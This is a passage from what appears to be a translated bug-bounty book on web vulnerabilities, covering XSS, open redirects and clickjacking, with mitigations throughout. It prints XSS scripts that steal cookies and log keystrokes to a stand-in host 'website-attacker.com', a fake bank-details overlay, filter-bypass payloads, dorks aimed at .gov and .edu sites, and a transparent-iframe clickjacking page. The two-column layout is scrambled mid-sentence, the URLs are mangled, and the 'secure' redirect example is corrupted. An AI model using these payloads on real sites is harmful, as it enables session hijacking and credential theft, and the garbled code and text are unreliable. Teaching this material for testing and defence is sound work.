sus propias características y requiere diferentes enfoques de
mitigación. Al aplicar las mejores prácticas de seguridad, como la
validación y codificación de entradas, el uso de Content Security
Policy (CSP) y la implementación de HttpOnly cookies, puedes
proteger tu aplicación web y a tus usuarios de los ataques XSS.
Search methodologies
We will explore the techniques and tools used by security
researchers to discover these vulnerabilities in web applications.
 Hunting for XSS requires a methodical and systematic
approach. Below is a general methodology you can follow:
1. Recognition:
• Gathers information about the target web application,
such as its technology, functionalities and structure.
• Identifies possible entry points for user-supplied data
such as forms, search fields and URL parameters.
2. Source code analysis:
• If possible, review the application source code for code
patterns vulnerable to XSS, such as direct concatena-
tion of unvalidated data in HTML output.
3. Manual testing:
• Try injecting basic XSS payloads at the identified entry
points. Start with simple payloads like <script>aler-
t('XSS')</script> and see if they execute in the browser.
• Experiment with different types of encoding (URL,
HTML, JavaScript) and evasion techniques to bypass
security filters.
4. Automated scanning:
• Use web vulnerability scanning tools such as Burp
Suite, OWASP ZAP or Nikto to automate the search
for XSS.
• Configure tools to scan for relevant entry points and
use predefined XSS payload lists.
5. Analysis of results:
• Reviews scan results and manual tests to identify
potential XSS vulnerabilities.
• Manually verify each finding to confirm that it is a
real vulnerability and not a false positive.
Tools & Techniques
• Burp Suite: A set of web security tools that includes
an intercepting proxy, a vulnerability scanner and a
request replayer. It is widely used by security resear-
chers to perform penetration testing and look for XSS
vulnerabilities.
• OWASP ZAP: An open source web vulnerability scan-
ner that can identify a wide range of vulnerabilities,
including XSS. It is easy to use and offers an intuitive
graphical interface.
• Nikto: A command-line web vulnerability scanner
that can perform fast, automated testing. It is useful
for scanning large numbers of websites for common
vulnerabilities.
• XSS Hunter: A platform that allows you to create cus-
tom XSS payloads that send alerts to your account
when executed in the victim's browser. It is useful for
detecting blind XSS vulnerabilities, where you cannot
directly see the result of the injection.
• PayloadsAllTheThings: A GitHub repository containing
a large collection of XSS payloads that you can use in
your tests.
Tips and Tricks
• Don't limit yourself to basic payloads: Experiment with
different types of payloads and evasion techniques to
find vulnerabilities that other researchers might miss.
• Pay attention to the context: The context in which
malicious code is injected is crucial in determining
whether it is vulnerable to XSS. Try different contexts,
such as HTML attributes, JavaScript events and varia-
ble values.
• Use debugging tools: Tools such as browser develo-
per consoles can help you analyze how your malicious
code is processed and executed in the victim's browser.
• Learn from other researchers: Follow security blogs
and forums, attend conferences and participate in
online communities to learn from other researchers and
keep up to date with the latest techniques and tools.
XSS hunting is a constant challenge, but it is also a very
rewarding skill. By mastering the techniques and tools presented
web vulnerabilities 49
in this chapter, you will be well on your way to becoming an expert
at detecting and preventing this critical vulnerability.
Bypass XSS protection
We will explore the advanced techniques attackers use to
bypass XSS protections and how defenders can fortify their web
applications against these attacks.
XSS Avoidance Techniques
Attackers employ a variety of techniques to evade XSS fil-
ters and protections:
1. Code obfuscation: Attackers can obfuscate their mali-
cious code to make it less recognizable by XSS filters.
This can include the use of encoding (URL, HTML,
JavaScript), special characters and JavaScript obfusca-
tion techniques such as the use of arrays, eval() func-
tions and regular expressions.
2. HTML manipulation: Attackers can modify the HTML
structure of a page to create new contexts for code
execution. For example, they can insert event attribu-
tes into existing HTML tags or create new tags with
on* attributes (such as onmouseover, onload, etc.) to
execute their malicious code.
3. DOM-based attacks: Attackers can exploit vulnerabi-
lities in the application's JavaScript code to inject mali-
cious code into the page's DOM (Document Object
Model). This can include manipulating events, modi-
fying attributes of HTML elements and creating new
elements.
4. Multi-sequence attacks: Attackers can split their XSS
payload into multiple parts and send them in different
requests or through different channels (e.g. cookies,
HTTP headers). This can make it difficult for XSS filters
to detect the entire payload.
5. Browser-based attacks: Attackers can exploit vulnera-
bilities in web browsers to execute their malicious code.
This can include the use of zero-day exploits, vulnera-
ble plugins or poorly implemented browser features.
50 MILLIONAIRE RECORDS
Strengthening XSS Defenses
To protect against XSS attacks, it is crucial to implement a
layered defense:
1. Strict input validation: Validates all user-supplied
data on the server side, ensuring that it complies with
expected formats and types. Use whitelists to allow
only specific characters and values.
2. Contextual output coding: Encodes all data displayed
to the user, using the appropriate coding technique
for each context (HTML, JavaScript, CSS, URL, etc.).
3. Content Security Policy (CSP): Implement a strict CSP
to control which scripts, styles and other resources
can be loaded and executed in your web application.
4. HttpOnly Cookies: Sets the HttpOnly attribute on
session cookies to prevent them from being accessed
by JavaScript.
5. Software updates: Keep your software up to date,
including frameworks, libraries and web browsers, to
fix known vulnerabilities.
6. WAF (Web Application Firewall): Consider using a WAF
to detect and block known and suspected XSS attacks.
7. Safety tests: Performs regular penetration testing
and vulnerability scans to identify and fix XSS vulne-
rabilities before they can be exploited.
Pursuing XSS is a constant challenge as attackers continue
to develop new evasion techniques. By understanding these
techniques and strengthening your defenses, you can protect
your web application and your users from XSS attacks. Remember
that security is an ongoing process, and you should always be
on the lookout for new threats and vulnerabilities.
Filtering logic errors
we will explore a specific type of XSS vulnerability that
arises from errors in the logic of security filters implemented in
web applications. These errors, although often overlooked, can
be exploited by attackers to bypass XSS protections and exe-
cute malicious code in users' browsers.
What are Filter Logic Errors in XSS?
Filter logic errors in XSS occur when security filters desig-
ned to prevent the injection of malicious scripts contain flaws in
their design or implementation. These flaws can allow attackers
to bypass the filters using techniques such as:
Example 3: Filtering based on regular expression patterns
• Alternative encoding: Attackers can use different
encoding schemes (URL, HTML, JavaScript) to repre- An even more complex filter could use regular expressions
sent special characters that would normally be blo- to identify and block malicious code patterns. However, attackers
cked by filters. can find ways to bypass these regular expressions using special
• HTML structure manipulation: Attackers can insert characters, encryption or obfuscation techniques.
HTML tags or attributes that are not properly filte- XSS filter logic errors can be difficult to detect and pre-
red, creating new execution contexts for their mali- vent, but they are a real threat to web application security. By
cious code. understanding how these bugs work and following security best
• Injection in event attributes: Attackers can inject practices, you can protect your application and your users from
JavaScript code into event attributes (such as onclick, XSS attacks. Remember that security is an ongoing process, and
onmouseover, etc.) that are executed when the user you should always be on the lookout for new vulnerabilities and
interacts with the page. attack techniques.
• Multi-sequence attacks: Attackers can split their XSS
payload into multiple parts and send them in different
requests or through different channels, thus evading
filters that look for specific patterns.
• Browser-based attacks: Attackers can exploit vulne-
rabilities in web browsers to execute malicious code
that would not be blocked by server-side filters.

Examples of Filter Logic Errors in XSS

Example 1: Keyword-based filtering

A simple XSS filter could look for keywords such as "script",

"alert" or "onload" and block any input containing them. However,
an attacker could bypass this filter by using HTML encoding
(&#x73;cript, &#x61;lert, &#x6f;nload) or by using alternative
keywords (eval, setTimeout, etc.).

Example 2: HTML tag-based filter

A more sophisticated filter could attempt to remove all

HTML tags from the user input. However, an attacker could
use event attributes on allowed HTML tags (such as <img oner-
ror="alert('XSS')">) or create new tags with on* attributes to
execute their malicious code.

web vulnerabilities 51
 Example:
Escalating the attack
JavaScript
Once an attacker has discovered an XSS vulnerability in a
website, their primary goal is usually to go beyond simple code <script>
injection and exploit it to the fullest extent possible. This chapter document.onkeypress = function(e) {
explores the advanced techniques and strategies that attackers var key = (window.event) ? e.keyCode : e.which;
use to escalate their XSS attacks and cause a greater impact. var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://website-attacker.com/keylog-
1. Session and Cookie Theft ger', true);xhr.send('key=' + key);
};
• Objective: To hijack the session of a legitimate user </script>
in order to impersonate him.
• Technique: Inject an XSS script that captures the 3. Phishing Attacks
user's session cookies and sends them to the attacker.
• Objective: To trick users into revealing confidential
Example: information.
• Technique: Inject an XSS script that displays a fake
JavaScript pop-up window that mimics the appearance of the
legitimate website and requests sensitive data.
<script>
var cookies = document.cookie; Example:
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://website-attacker.com/steal- JavaScript
-cookies', true);
x h r . s e t R e q u e s t H e a d e r ( ' C o n t e n t -Ty p e ', <script>
'application/x-www-form-urlencoded'); window.onload = function() {
xhr.send('cookies=' + encodeURIComponent(cookies)); var overlay = document.createElement('div');
</script> overlay.innerHTML = '<div style="...">Enter your bank
details::</div>';
document.body.appendChild(overlay);
2. Keylogging };
</script>
• Purpose: To record user keystrokes to capture sen-
sitive information (passwords, credit card data, etc.). 4. Propagation of XSS to Other Users
• Technique: Inject an XSS script that logs each keys-
troke and sends the data to the attacker. • Objective: Amplify the attack by infecting other
users of the website.
• Technique: Use stored XSS to inject malicious code
into areas of the site where other users will see it, such
as forums or comments.

52 MILLIONAIRE RECORDS
5. XSS on Trusted Sites

• Objective: To take advantage of the trust that users

have in a legitimate site to carry out more effective
attacks.
• Technique: Inject XSS into a highly reputable web-
site and redirect users to malicious sites or display
misleading content.

6. Escalation of Privileges

• Purpose: To gain access to restricted functions and

data that the current user should not have access to.
• Technique: Use XSS to manipulate client-side logic
and perform actions on behalf of the user without
their knowledge.

Defenses against XSS Escalation Attacks

• Input validation: Implement strict validation of all

user input to prevent malicious code injection.
• Output encoding: Correctly encode the data before
displaying it in the browser to prevent it from being
interpreted as code.
• Content Security Policy (CSP): Restrict the sources
from which content can be uploaded to the website.
• WAF (Web Application Firewall): Use a WAF to
detect and block XSS attacks.

web vulnerabilities 53

Automated XSS
Manually searching for XSS vulnerabilities can be a tedious
and time-consuming process. Fortunately, automation tools
and techniques exist that allow security researchers to scale
their efforts and discover XSS more efficiently. This chapter
explores how to automate XSS hunting, from reconnaissance
to exploitation.
1. Automated Recognition
1. Objective: Identify possible entry points for XSS
on a web site.
2. Tools:
• Web crawlers (Crawlers): Crawl the website auto-
matically, collecting URLs and parameters. Examples:
Burp Suite Spider, ZAP Spider.
• Vulnerability scanners: They look for known XSS
patterns in web pages. Examples: Nikto, OWASP ZAP.
• Fuzzer: They send malicious inputs to website para-
meters to test if they are vulnerable to XSS. Examples:
Wfuzz, ffuf.
Example: Use a web crawler to collect all the URLs of a
website, then use a vulnerability scanner to scan each page
for XSS.
2. Automated Payload Generation
1. Objective: Create custom XSS payloads to evade
filters and maximize impact.
2. Tools:
• XSS Payload Generators: Generate XSS payloads
based on different contexts and coding techniques.
Examples: XSS Hunter, XSSer.
• Payload Lists: Compilations of known and effec-
tive XSS payloads.
Example: Use a payload generator to create an XSS payload
that executes even if it is encoded in HTML.
3. Automated Injection and Testing
1. Objective: Inject XSS payloads in the identified entry
points and verify if they are executed.
2. Tools:
• Penetration test frameworks: Automate the
54 MILLIONAIRE RECORDS
injection and testing of XSS payloads. Examples: Burp
Suite Intruder, ZAP Active Scan.
• Custom Scripts: Develop scripts to automate
specific tasks, such as injecting payloads into forms.
Example: Use Burp Suite Intruder to inject a list of XSS
payloads into a search parameter and analyze the responses to
detect if any are executed.
4. Automated Monitoring and Alerting
• Objective: Receive real-time notifications when an
XSS is discovered.
Tools:
• XSS Hunter: Platform to generate XSS payloads
and receive alerts when they are triggered.
• Burp Collaborator: Tool to detect interactions
with XSS payloads trying to communicate with exter-
nal servers.
Example: Use XSS Hunter to generate an XSS payload
and receive an email alert when a user visits a page con-
taining the payload.
5. Integration with Development Workflows
1. Objective: Incorporate XSS detection in the software
development process.
2. Tools:
• SAST (Static Application Security Testing):
Analyzes source code for XSS vulnerabilities. Examples:
SonarQube, Checkmarx.
• DAST (Dynamic Application Security Testing):
Performs security tests on the running application to
detect XSS.
Example: Integrate a SAST scanner into the software
build process to detect and fix XSS vulnerabilities before
the application is deployed.
Legal and Ethical Considerations
Automating XSS hunting should be done in a responsible
and ethical manner. It is important to obtain proper permission
before testing on third-party websites and to avoid causing
damage or disruption.
Tips for finding your first XSS

• Start with the basics: Practice with simple XSS

payloads and learn to identify common patterns of
vulnerabilities.
• Use tools: There are many tools available that can
help you automate the search for XSS, such as vulne-
rability scanners and fuzzers.
• Learn from others: Read vulnerability reports, blogs
and tutorials to learn the latest XSS techniques and
strategies.
• Don't give up: Finding your first XSS may take time
and patience, but the rewards of discovering a real
vulnerability are priceless.

web vulnerabilities 55
2 . 3 - OPE N R E DI R E C T
#2.3
Open redirects are a type of vulnerability that occurs when
a web application accepts user-controlled input to redirect the
user to a specified URL, but does not properly validate or sani-
tize this input. This can lead to phishing attacks and other mali-
cious activity. In this chapter, we will explore what open redi-
rects are, how they work, and provide real-world examples that
illustrate their impact.
Understanding open redirects
An open redirect occurs when an application includes user-
-controlled data in a URL redirect without proper validation.
Attackers can exploit this by creating URLs that redirect users
to malicious websites, making it easy to trick them.
Real-world examples
Let's examine some real-world examples to understand how
open redirects work and the potential risks they pose.
Example 1: Open Redirect on a login page
Let's imagine a website with a login form that includes a
"next" parameter in the URL to redirect users to a specific page
after logging in:
--------------------
http://example.com/login?next=http://example.com/
dashboard
--------------------
An attacker can exploit this by changing the "next" para-
meter to a malicious site:
--------------------
http://example.com/login?next=http://malicious.com
--------------------
If the application does not validate the "next" parameter, it
will redirect users to the malicious site after logging in.
56 MILLIONAIRE RECORDS
Example 2: Opening Redirect in a marketing e-mail
Consider a marketing email that includes a link to a promo-
tional offer with a redirect parameter:
--------------------
http://example.com/offer?redirect=http://example.com/
thankyou
--------------------
An attacker could modify the redirect parameter to point
to a phishing site:
--------------------
http://example.com/offer?redirect=http://phishing.com
--------------------
When users click on the link, they are redirected to the
phishing site, which may look like the legitimate site and ask
them to enter sensitive information.
Example 3: Opening Redirect in a URL shortening service
Many URL shorteners take a URL as input and redirect users
to the destination. An open redirect vulnerability can occur if the
service does not properly validate the input URL:
--------------------
http://shortener.com/?url=http://example.com
--------------------
An attacker could create a shortened URL that redirects
to a malicious site:
--------------------
http://malicious.com/?url=http://malice.com
--------------------
Users clicking on the shortened URL would be redirected
to the malicious site
.
 and loss of user trust. By understanding how open redirects work
Risks and impacts and learning from real-world examples, you can better protect
web applications from these attacks. Always validate and sanitize
Open redirects can lead to several serious risks: user input, use whitelists and minimize user-controlled redirects
to mitigate the risks associated with open redirects.
1. Phishing attacks: Attackers can create URLs that
appear to be from a trusted source, but redirect users
to phishing sites, where they can steal login creden-
tials or other sensitive information.
2. Malware distribution: Users can be redirected to
sites hosting malware, leading to their devices being
compromised.
3. Loss of trust: If users are frequently redirected to
malicious sites from a trusted web application, it can
damage the organization's reputation.

Prevent the opening of redirections

To avoid open redirects, web developers should:

1. Validate and sanitize input: Ensure that any user-con-

trolled input used in redirects is properly validated
and sanitized.
2. Use of whitelists: Apply whitelists of URLs allowed for
redirects. Only allow redirects to URLs that are expli-
citly listed and trusted.
3. Avoid user-controlled redirects: Whenever possible,
avoid using user-controlled input to redirect altogether.

Secure code examples:

// Input validation
$url = $_GET['url'];
if (!filter_var($url, FILTER_VALIDATE_URL) || !preg_mat-
ch('/^https:\/\/fanyv88.com:443\/https\/legitimate-site\.com/', $url)) {
die("URL invalid");
}

// Server-side redirection
header("Location: $url");
exit;

Open redirects are a common and potentially dangerous vul-

nerability that can lead to phishing attacks, malware distribution

web vulnerabilities 57
 Find your first Open Redirect How to exploit open redirects?

What are open redirects?
An open redirect occurs when a web application accepts
uncontrolled parameters that specify the destination URL of a
redirect. This allows attackers to build links that appear to come
from the legitimate website, but actually redirect users to mali-
cious sites.
Once an open redirect is identified, an attacker can build a
malicious link that redirects users to a website controlled by the
attacker. This link can be distributed via email, social networks,
forums, etc.
Using Google Dorks to Find Additional
Redirect Parameters

Examples of open redirects: Redirect parameters on websites are a common target for
Cross-Site Scripting (XSS) attacks. These parameters are often
• URL parameters: not properly protected, allowing attackers to inject malicious
code that executes in the victim's browser. In this chapter, we
https://sitio-legitimo.com/redirect.php?url=https://site-ma- will explore how to use Google Dorks, a powerful technique for
licious.com searching Google for specific information, to discover vulnerable
redirect parameters on websites.
• Parameters on forms:
What is Google Dorks?
HTML
Google Dorks are special search queries that use advanced
<form action="/redirect.php" method="POST"> operators to refine search results. These operators allow you to
<input type="hidden" name="url" value="https://site-ma- search for specific file types, keywords in specific locations on
licious.com"> a web page, and even known vulnerabilities.
</form>
Finding Redirect Parameters with Google Dorks
How to find open redirects?
To find redirection parameters, we can use the following Google
• Manual analysis of the source code: Search for para- Dorks:
meters that control redirects and verify if they are pro-
perly validated. • inurl: Searches for a specific keyword in a web page
• Security analysis tools: Use web vulnerability scan- URL.
ners such as OWASP ZAP or Burp Suite to identify • site: Narrows the search to a specific web site.
open redirects.
• Google Dorking: Look for URL patterns that may By combining these operators, we can create dorks like
indicate the presence of open redirects. For example: the following:
site:site-legitimate.com inurl:redirect
• inurl:redirect site:.gov
• inurl:url site:.edu
• inurl:return site:.com
• inurl:redir site:.org

These dorks will look for parameters such as "redirect", "url",

"return" and "redirect" on government (.gov), educational (.edu),
commercial (.com) and organization (.org) websites.

58 MILLIONAIRE RECORDS
 Practical Examples
Suppose we find the following result using one of our dorks:
https://www.example.com/redirect.php?url=https://www.
google.com
In this case, the "url" parameter is a redirect parameter. We
can test if it is vulnerable to XSS by injecting a basic payload
such as:
https://www.example.com/redirect.php?url=https://www.
google.com<script>alert(1)</script>
If the website is vulnerable, we will see a pop-up alert with
the number "1".
Additional Tips
• Try different dorks combinations: Experiment with
different keywords and operators to find more redi-
rect parameters.
• Use automated tools: There are tools that automate
the search for redirect parameters using Google Dorks.
• Be ethical: Use this technique only on websites that
have given you permission for security testing.
Precautions
• Not all redirection parameters are vulnerable: Some
websites implement security measures to protect
against XSS.
• Google may block your IP address: If you perform too
many searches in a short period of time, Google may
temporarily block your IP address.
Bypass protection
Open redirect vulnerabilities allow attackers to manipu-
late a website's redirect logic to send users to malicious desti-
nations. Although many sites implement protections to prevent
this type of attack, persistent attackers often find ways to evade
these defenses. This chapter explores common techniques used
to circumvent overt redirect protection and how defenders can
strengthen their security measures.
1. Character encoding and URL obfuscation
• Purpose: To hide the true nature of the redirection
destination using character encoding or obfuscation
techniques.
Técnicas:
• URL encoding: Replace special characters in the
URL with their encoded equivalents (e.g. %2F for /).
Double encoding: Encode the URL several times to
evade simple filters.
• Domain obfuscation: Using similar Unicode characters
to create domains that appear legitimate. (por ejemplo,
xn--pple-43d.com para apple.com).
• Example:
https://website-vulnerable.com/redirect?url=https%3A%-
2F%2Fwebsite-vulnerable.com
2. Parameter abuse and validation logic
• Objective: To exploit errors in the implementation
of the redirection validation logic.
• Techniques:
1. Parameter manipulation: Modify unexpected para-
meters to bypass filters.
2. njecting special characters: Entering characters such
as blank spaces or new lines to alter the URL validation.
3. Redirect chains: Use multiple redirects to hide the
final destination.
• Ejemplo:
https://website-vulnerable.com/redirect?url=https://legiti-
mate-site.com?url=https://malicious-site.com
web vulnerabilities 59

3. Client-side attacks
- Objective: Exploit client-side vulnerabilities to bypass
open redirection protection.
- Techniques:
1. XSS (Cross-Site Scripting): Inject JavaScript code to per-
form the redirection from the user's browser.
2. DOM manipulation: Modify web page content to change
redirection destination.
- Example::
JavaScript
<script>
window.location.href = "https://malicious-site.com";
</script>
4. Open redirects in subdomains
- Objective: To exploit trust in subdomains controlled by
the attacker.
- Technique: Register a subdomain on the vulnerable site
and use it to redirect users.
- Example:
https://website-vulnerable.com/redirect?url=https://sub-
domain-attacker.site-vulnerable.com
Defenses against open redirection protection evasion
- Domain whitelisting: Allow redirects only to specific and
trusted domains.
- Strict URL validation: Implement stringent validation of
the destination URL, including checking for special
characters and URL normalization.
- Use of CSRF tokens: Use CSRF tokens to protect redi-
rect requests.
- XSS protection: Prevent injection of JavaScript code that
can perform malicious redirects.
- Monitoring and logging: Log all redirect requests to detect
suspicious patterns...
By understanding evasion techniques and strengthening
defenses, web developers and administrators can better
60 MILLIONAIRE RECORDS
protect their users from the risks associated with open
redirect vulnerabilities.
Escaling the attack
Open Redirects vulnerabilities are often considered low risk,
but they can be escalated for more sophisticated and dan
gerous attacks. This chapter explores how attackers can
exploit open redirects to carry out phishing, credential theft,
security bypass and other advanced attacks.
1. Phishing and Credential Theft
- Goal: Trick users into revealing sensitive information.
- Technique: Create an open redirect URL that looks legiti
mate and directs users to a fake website that mimics the
original.
- Example:
https://sitio-legitimo.com/redirect?url=https://sitio-falso.
com/login
An attacker could send this URL to a user, making them
believe they are being redirected to the legitimate login
page.
2. Security Bypass
- Objective: To bypass security filters and access controls.
- Technique: Use an open redirect to access internal or res
tricted resources that would not normally be available.
- Example:
https://sitio-corporativo.com/redirect?url=https://sitio-cor
porativo.com/admin
An attacker could use this URL to access the corporate
site's administration panel, even if he does not have valid
credentials.
3. CSRF (Cross-Site Request Forgery) Attacks
- Objective: Perform unauthorized actions on behalf of a
user.
- Technique: Combine an open redirect with a CSRF attack
to trick the user's browser into executing malicious
actions on a logged-in website.
- Example:
- CSRF tokens: Use CSRF tokens to protect against CSRF
An attacker could send an open redirect link to a user that attacks.
contains a hidden CSRF attack. Upon clicking the link, the - X-Frame-Options: Use the X-Frame-Options header to
user's browser would be redirected to a legitimate web prevent clickjacking attacks.
site, but the CSRF attack would run in the background,
performing unauthorized actions without the user's
knowledge.

4. Clickjacking attacks

- Objective: Trick users into clicking on invisible or disgui

sed elements.
- Technique: use an open redirect to load a malicious web
page in an invisible iframe over a legitimate page.
- Example:

An attacker could create a web page containing an invi

sible button over a legitimate link. Upon clicking the link,
the user would be redirected to another page, but the invi
sible button would also be clicked, performing some mali
cious action without the user's knowledge.

5. XSS (Cross-Site Scripting) Attack Amplification

- Objective: To increase the impact of an XSS attack.

- Technique: Use an open redirect to redirect users to a
page containing a malicious XSS script.
- Example:

https://sitio-vulnerable.com/redirect?url=https://sitio-ata
cante.com/xss.js

An attacker could inject this URL into an XSS vulnerable

website. When a user visits the injected page, their brow
ser would be redirected to the attacker's page, where the
XSS script would be executed.

Defenses against Open Redirects Escalation

- URL validation: Implement strict validation of all redi

rect URLs to ensure that they only point to allowed domains
and paths.
- Whitelist: Maintain a whitelist of allowed redirect URLs
and block all others.
- User warnings: Display clear warnings to users before
redirecting them to an external site.

web vulnerabilities 61
2 . 4 - CL I C K JA C K I NG
#2.4
Clickjacking is a vulnerability in which an attacker tricks
users into clicking on invisible or disguised web elements, such
as buttons or links, without them realizing it. This type of attack
can have serious consequences, such as disclosing personal
information, performing unwanted actions or compromising
system security.
Understanding Clickjacking
Clickjacking works by placing a transparent page or web ele-
ment over another page that the user considers legitimate. In this
way, when the user tries to interact with the visible page, they
are actually interacting with the hidden page or hidden elements.
Real-life examples of Clickjacking
Let's explore some real examples to understand how click-
jacking works and the risks it can entail.
Example 1: Clickjacking on a Social Media "Like" Button
Imagine a web page that has a Facebook "Like" button. An
attacker could create a malicious page that loads the legitimate
Facebook page in a transparent iframe, positioning the "Like"
button just below the user's cursor. The user thinks they are cli-
cking on a visible link or button on the malicious page, but they
are actually clicking on the Facebook "Like" button.
----------------
<html>
<head>
<style>
iframe {
opacity: 0; /* Makes the iframe transparent */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
62 MILLIONAIRE RECORDS
}
</style>
</head>
<body>
<h1>Click here to win a prize!</h1>
<iframe src="https://www.facebook.com/
like_button_page"></iframe>
</body>
</html>
----------------
Ejemplo 2: Clickjacking on a Security Settings Page
Consider a bank account web page that has a button to
change security settings, such as enabling or disabling two-fac-
tor authentication (2FA). An attacker could load this page in a
transparent iframe over a page with a fake appeal, such as a
personality quiz or online game. When the user thinks they are
interacting with the quiz or game, they are actually disabling 2FA
on their bank account.
Example 3: Clickjacking on a Payment Form
A malicious website could load a legitimate merchant's pay-
ment form in a transparent iframe about a game or survey. Users
think they are interacting with the game or survey, but are actually
entering their credit card information into the payment form.
Risks and Consequences
Clickjacking can lead to several serious consequences:
1. Disclosure of Personal Information: Users can be tri-
cked into divulging sensitive information, such as pas-
swords, credit card numbers, and other personal data.
2. Unwanted Actions: Users can perform actions on your
behalf without your consent, such as posting on social
networks, sending emails, or changing security settings.
3. Compromise of System Security: Attackers can disable
security features, such as two-factor authentication,
further compromising user security.
 Clickjacking Prevention

To prevent clickjacking, web developers should implement

the following measures:

• HTTP Security Headers: Use the X-Frame-Options

or Content-Security-Policy (CSP) headers to control
whether a page can be loaded in an iframe.
• X-Frame-Options: DENY prevents the page from
loading in any iframe.
• X-Frame-Options: SAMEORIGIN allows the page
to load in an iframe only if the origin is the same.
• The CSP policy can specify more complex rules
for iframes.

Frame Busting: Implements JavaScript techniques to

prevent your page from being loaded in an iframe. For example:

----------------
if (window.top !== window.self) {
window.top.location = window.self.location;
}
----------------

User Interface Design: Design user interfaces that are

less susceptible to clickjacking attacks, such as avoiding exces-
sive use of iframes and improving the visibility of critical actions.

Clickjacking is a serious vulnerability that can lead to devas-

tating consequences if not handled properly. Understanding how
it works and learning from real-world examples can help protect
your web applications and your users. Implement security hea-
ders, frame busting techniques, and design secure user interfa-
ces to mitigate the risks associated with clickjacking.

web vulnerabilities 63

Advanced search
Clickjacking, also known as click hijacking, is a malicious
technique in which an attacker tricks a user into clicking on a
visible element on a web page, while actually interacting with a
hidden or transparent element in an overlay. This chapter explo-
res how to identify and exploit clickjacking vulnerabilities.
1. Understanding Clickjacking
• Objective: To become familiar with the basic con-
cepts of clickjacking and its different variants.
• Types of Clickjacking:
1. Classic Clickjacking: The attacker superimposes a
transparent iframe over a legitimate button.
2. Likejacking: The attacker tricks the user into cli-
cking the Facebook "Like" button.
3. Cursorjacking: The attacker manipulates the mouse
cursor to point to an element other than the one the
user thinks he/she is clicking.
• Impact: Theft of credentials, disclosure of confiden-
tial information, installation of malware, execution of
unwanted actions.
2. Identifying Clickjacking Vulnerabilities
• Objective: To find web pages susceptible to click-
jacking attacks.
• Tools:
1. Manual inspection: Examine the source code of
the page for iframes and overlapping layers.
2. Browser extensions: Use extensions such as
"Clickjacking Test" to detect possible vulnerabilities.
3. Vulnerability scanners: Employ tools such as
OWASP ZAP to automatically identify clickjacking
vulnerabilities.
• Example: Analyze the source code of a web page
and discover a hidden iframe that loads an external site.
64 MILLIONAIRE RECORDS
3. Exploiting Clickjacking Vulnerabilities
• Objective: To demonstrate how an attacker can
exploit a clickjacking vulnerability.
• Techniques:
1. Create a malicious page: Design a web page that
overlays a transparent iframe over a legitimate button
on another page.
2. Luring the user: Using social engineering to lure
the user to the malicious page (e.g. through a mislea-
ding link).
3. Trick the user: Make the user click on the visible
button, which will actually activate the hidden button
in the iframe.
• Example: Create a malicious page that overlays
a transparent iframe over the "Buy Now" button of
an e-commerce site, replacing it with a "Win a prize"
button.
4. Mitigating Clickjacking
• Objective: To protect web pages against clickja-
cking attacks.
• Techniques:
1. X-Frame-Options: Configure this HTTP header to
control whether a page can be embedded in an iframe.
2. Content Security Policy (CSP): Use CSP policies to
restrict the loading of external content and prevent
the embedding of unauthorized iframes.
3. Framebusting: Implement scripts that detect if a
page is being loaded in an iframe and break the frame.
• Example: Set the X-Frame-Options header to "DENY"
to prevent a page from being embedded in an iframe.
5. Clickjacking on Mobile Devices
• Objective: To understand how clickjacking can affect
mobile device users.
• Challenges: Touch screens make it more difficult for
users to detect transparent overlays.
• Mitigation: Apply the same mitigation techniques as
for desktop browsers, in addition to considering res-
ponsive design and user experience on mobile devices.
 Content-Security-Policy: frame-ancestors *.domain-atta-
Overcoming protection cker.com

Attackers can employ a variety of techniques to circum- 3. Hybrid Attacks

vent them and carry out their attacks. This chapter delves into
these techniques and mitigation strategies. • Combination of Techniques: Attackers can combine
Clickjacking with other vulnerabilities, such as XSS or
CSRF, to increase the impact of their attacks.
1. Bypassing X-Frame-Options • Example: Injecting an XSS script into a vulnerable
site and then performing a Clickjacking attack to trick
• X-Frame-Options: An HTTP header that tells the the user into performing unwanted actions.
browser whether to allow a page to be displayed in
an iframe. 4. Clickjacking on Mobile Devices
• Avoidance Techniques:
1. Frame Busting: Inject JavaScript code into the • Additional Challenges: The smaller screens and touch
victim website to break the iframe. interaction of mobile devices present unique challen-
2. Nested iframes: Use nested iframes to bypass ges for Clickjacking.
X-Frame-Options protection. • Avoidance Techniques:
3. Clickjacking on Vulnerable Sites: Search for websi- 1. Transparent Overlay: Overlay a transparent iframe over
tes that do not correctly implement X-Frame-Options. legitimate user interface elements.
• Example (Frame Busting): 2. Gesture Manipulation: Hijacking touch gestures to
perform unwanted actions.
JavaScript
Clickjacking Mitigation
<script>
if (top != self) { • X-Frame-Options: Configure this header properly to
top.location.href = self.location.href; prevent the site from displaying in iframes.
} • Content Security Policy (CSP): Implement a strict
</script> CSP policy to control resource load.
• Frame Busting: Use scripts to break iframes and
2. Bypassing Content Security Policy (CSP) redirect the user to the main page.
• User Awareness: Educate users about the risks of
• CSP: It is an additional layer of security that allows Clickjacking and how to identify it.
you to control which resources can be loaded on a page.
• Avoidance Techniques: Advanced Examples
1. Social Engineering: Tricking the user into clicking
on a malicious link that leads to a vulnerable page. • Social Media Clickjacking: Tricking users into posting
2. Attacks on Third-Party Sites: Search for XSS vul- unwanted content or following malicious accounts.
nerabilities in third-party websites that load on the • Clickjacking in Web Applications: Exploiting vulne-
target site. rabilities in web applications to perform unauthori-
3. Use of Subdomains: Hosting malicious content zed actions.
on a subdomain of the target site that is not protec-
ted by CSP.
• Example (CSP Unsecured):

web vulnerabilities 65
 Escalating the attack
While a basic clickjacking attack may seem trivial, attackers
can escalate this technique to achieve more damaging targets.
This chapter explores how clickjackers can take their attacks to
the next level and the defenses that can be implemented.
1. Basic Clickjacking: The Initial Deception
